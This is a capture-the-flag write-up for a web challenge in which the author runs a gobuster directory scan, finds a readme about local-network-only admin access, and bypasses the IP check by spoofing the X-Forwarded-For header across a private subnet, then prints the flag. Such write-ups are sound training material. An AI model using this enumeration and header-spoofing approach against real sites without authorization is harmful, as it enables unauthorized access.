WH01 - 500pts
Briefing
Access the site at https://cfta-wh01.allyourbases.co and find a way to get the flag from the CMS.
Solution
Since the website looks pretty empty we can try some directory busting:
gobuster dir -u https://cfta-wh01.allyourbases.co/ -t 200 --exclude-length 16 --extensions txt,html -w /usr/share/wordlists/dirb/common.txt
. We use the commondirb
list included with Kali and also check for files withtxt
orhtml
extensions.gobuster
output:[+] Url: https://cfta-wh01.allyourbases.co/ [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] Exclude Length: 16 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,html [+] Timeout: 10s =============================================================== 2021/04/08 19:43:11 Starting gobuster in directory enumeration mode =============================================================== /admin.html (Status: 304) [Size: 0] /index.html (Status: 200) [Size: 616] /index.html (Status: 200) [Size: 616] /readme.txt (Status: 200) [Size: 154] /soap (Status: 200) [Size: 0] =============================================================== 2021/04/08 19:43:23 Finished ===============================================================
We find an interesting
/admin.html
file, which is empty, and/readme.txt
./readme.txt
says the following:To use the CMS make sure to visit /admin.html from allowed IPs on the local network. Note: Tell engineering to stop moving the subnet from 192.168.0.0/24
So,
/admin.html
only works when a request comes from an IP on the local network. It's possible that the service is simply checking theX-Forwarded-For
HTTP header so let's try that.We can use a Python script to loop through every possible IP and make a get request with the
X-Forwarded-For
set to the IP that is currently being tested. If the length of the response is greater than 0, we print the response. This finds the flag after a few seconds.
Flag
iPSpooFinGWiThHopHeaDers91918
Last updated
Was this helpful?